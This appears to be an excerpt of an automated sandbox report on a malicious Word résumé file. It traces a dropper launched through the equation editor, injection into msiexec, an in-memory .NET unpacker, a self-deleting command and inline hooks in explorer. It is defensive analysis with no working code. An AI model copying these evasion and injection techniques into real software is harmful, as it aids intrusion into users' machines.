          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251E2E97_2_0251E2E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025273537_2_02527353
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0256A37B7_2_0256A37B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025223057_2_02522305
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025463DB7_2_025463DB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251F3CF7_2_0251F3CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253905A7_2_0253905A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025230407_2_02523040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254D0057_2_0254D005
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251E0C67_2_0251E0C6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C26227_2_025C2622
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252E6C17_2_0252E6C1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025246807_2_02524680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025557C37_2_025557C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A579A7_2_025A579A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252C7BC7_2_0252C7BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025554857_2_02555485
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025314897_2_02531489
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252351F7_2_0252351F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253C5F07_2_0253C5F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025D3A837_2_025D3A83
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02547B007_2_02547B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025ADBDA7_2_025ADBDA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251FBD77_2_0251FBD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025CCBA47_2_025CCBA4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252C85C7_2_0252C85C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254286D7_2_0254286D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025BF8EE7_2_025BF8EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025A59557_2_025A5955
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025369FE7_2_025369FE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C098E7_2_025C098E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025229B27_2_025229B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253EE4C7_2_0253EE4C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02552E2F7_2_02552E2F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254DF7C7_2_0254DF7C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02530F3F7_2_02530F3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252CD5B7_2_0252CD5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02550D3B7_2_02550D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025BFDDD7_2_025BFDDD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012E5B37_2_0012E5B3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D5A67_2_0012D5A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00112D907_2_00112D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012DE467_2_0012DE46
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00119E607_2_00119E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00112FB07_2_00112FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012DFA27_2_0012DFA2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009B3F92 appears 105 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009B373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 0096DF5C appears 104 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 0096E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009DF970 appears 81 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0258F970 appears 81 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0251DF5C appears 106 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0256373B appears 238 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 02563F92 appears 108 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0251E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A35A NtCreateFile,5_2_0041A35A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A40A NtReadFile,5_2_0041A40A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A48A NtClose,5_2_0041A48A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009600C4 NtCreateFile,LdrInitializeThunk,5_2_009600C4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00960048
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960078 NtResumeThread,LdrInitializeThunk,5_2_00960078
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F9F0 NtClose,LdrInitializeThunk,5_2_0095F9F0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F900 NtReadFile,LdrInitializeThunk,5_2_0095F900
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0095FAD0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0095FAE8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0095FBB8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0095FB68
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0095FC90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0095FC60
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FD8C NtDelayExecution,LdrInitializeThunk,5_2_0095FD8C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0095FDC0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0095FEA0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0095FED0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FFB4 NtCreateSection,LdrInitializeThunk,5_2_0095FFB4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009610D0 NtOpenProcessToken,5_2_009610D0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960060 NtQuerySection,5_2_00960060
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009601D4 NtSetValueKey,5_2_009601D4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096010C NtOpenDirectoryObject,5_2_0096010C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961148 NtOpenThread,5_2_00961148
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009607AC NtCreateMutant,5_2_009607AC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F8CC NtWaitForSingleObject,5_2_0095F8CC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961930 NtSetContextThread,5_2_00961930
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F938 NtWriteFile,5_2_0095F938
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAB8 NtQueryValueKey,5_2_0095FAB8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FA20 NtQueryInformationFile,5_2_0095FA20
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FA50 NtEnumerateValueKey,5_2_0095FA50
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FBE8 NtQueryVirtualMemory,5_2_0095FBE8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FB50 NtCreateKey,5_2_0095FB50
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC30 NtOpenProcess,5_2_0095FC30
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960C40 NtGetContextThread,5_2_00960C40
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC48 NtSetInformationFile,5_2_0095FC48
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961D80 NtSuspendThread,5_2_00961D80
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FD5C NtEnumerateKey,5_2_0095FD5C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FE24 NtWriteVirtualMemory,5_2_0095FE24
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FFFC NtCreateProcessEx,5_2_0095FFFC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FF34 NtQueueApcThread,5_2_0095FF34
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,5_2_0029A036
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A042 NtQueryInformationProcess,5_2_0029A042
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025100C4 NtCreateFile,LdrInitializeThunk,7_2_025100C4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025107AC NtCreateMutant,LdrInitializeThunk,7_2_025107AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0250FAE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FB50 NtCreateKey,LdrInitializeThunk,7_2_0250FB50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0250FB68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0250FBB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F900 NtReadFile,LdrInitializeThunk,7_2_0250F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F9F0 NtClose,LdrInitializeThunk,7_2_0250F9F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0250FED0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FFB4 NtCreateSection,LdrInitializeThunk,7_2_0250FFB4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0250FC60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0250FDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FD8C NtDelayExecution,LdrInitializeThunk,7_2_0250FD8C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510048 NtProtectVirtualMemory,7_2_02510048
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510078 NtResumeThread,7_2_02510078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510060 NtQuerySection,7_2_02510060
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025110D0 NtOpenProcessToken,7_2_025110D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511148 NtOpenThread,7_2_02511148
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251010C NtOpenDirectoryObject,7_2_0251010C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025101D4 NtSetValueKey,7_2_025101D4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FA50 NtEnumerateValueKey,7_2_0250FA50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FA20 NtQueryInformationFile,7_2_0250FA20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAD0 NtAllocateVirtualMemory,7_2_0250FAD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAB8 NtQueryValueKey,7_2_0250FAB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FBE8 NtQueryVirtualMemory,7_2_0250FBE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F8CC NtWaitForSingleObject,7_2_0250F8CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511930 NtSetContextThread,7_2_02511930
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F938 NtWriteFile,7_2_0250F938
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FE24 NtWriteVirtualMemory,7_2_0250FE24
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FEA0 NtReadVirtualMemory,7_2_0250FEA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FF34 NtQueueApcThread,7_2_0250FF34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FFFC NtCreateProcessEx,7_2_0250FFFC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510C40 NtGetContextThread,7_2_02510C40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC48 NtSetInformationFile,7_2_0250FC48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC30 NtOpenProcess,7_2_0250FC30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC90 NtUnmapViewOfSection,7_2_0250FC90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FD5C NtEnumerateKey,7_2_0250FD5C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511D80 NtSuspendThread,7_2_02511D80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A360 NtCreateFile,7_2_0012A360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A410 NtReadFile,7_2_0012A410
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A490 NtClose,7_2_0012A490
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A35A NtCreateFile,7_2_0012A35A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A40A NtReadFile,7_2_0012A40A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A48A NtClose,7_2_0012A48A
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: seasonzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: seasonhd72463.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C.V_Job Request.docVirustotal: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$V_Job Request.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDECA.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/10@2/1
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmpBinary or memory string: insert into mediaitem (name, type, checked_to_patron_id, checkout_date, due_date) values (@name, @type, @patron_id, @co_date, @due_date);
          Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmpBinary or memory string: select id, name, type, checked_to_patron_id, checkout_date, due_date from mediaitem {0} order by name;where checked_to_patron_id = Mwhere checked_to_patron_id is not nullaselect id, name, type from patron where id = {0}_select id, name, type from patron order by nameWThe method or operation is not implemented.9Library.Properties.Resources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C.V_Job Request.docJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: seasonzx[1].exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: seasonhd72463.exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.6.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.1.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.10.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.seasonhd72463.exe.1100000.5.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.4.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.8.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.3.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00417162 push ebp; ret 5_2_00417163
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004165E8 push es; retf 5_2_004165E9
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041CE35 push edi; ret 5_2_0041CE36
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004176DE push ebp; iretd 5_2_004176A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041768B push ebp; iretd 5_2_004176A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096DFA1 push ecx; ret 5_2_0096DFB4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029E9B5 push esp; retn 0000h5_2_0029EAE7
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029EB02 push esp; retn 0000h5_2_0029EB03
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029EB1E push esp; retn 0000h5_2_0029EB1F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251DFA1 push ecx; ret 7_2_0251DFB4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00127162 push ebp; ret 7_2_00127163
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012E3EF push esp; ret 7_2_0012E3F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D4B5 push eax; ret 7_2_0012D508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D502 push eax; ret 7_2_0012D508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D50B push eax; ret 7_2_0012D572
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D56C push eax; ret 7_2_0012D572
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_001265E8 push es; retf 7_2_001265E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012768B push ebp; iretd 7_2_001276A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_001276DE push ebp; iretd 7_2_001276A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012CE35 push edi; ret 7_2_0012CE36
          Source: initial sampleStatic PE information: section name: .text entropy: 7.54284746889
          Source: initial sampleStatic PE information: section name: .text entropy: 7.54284746889
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEB
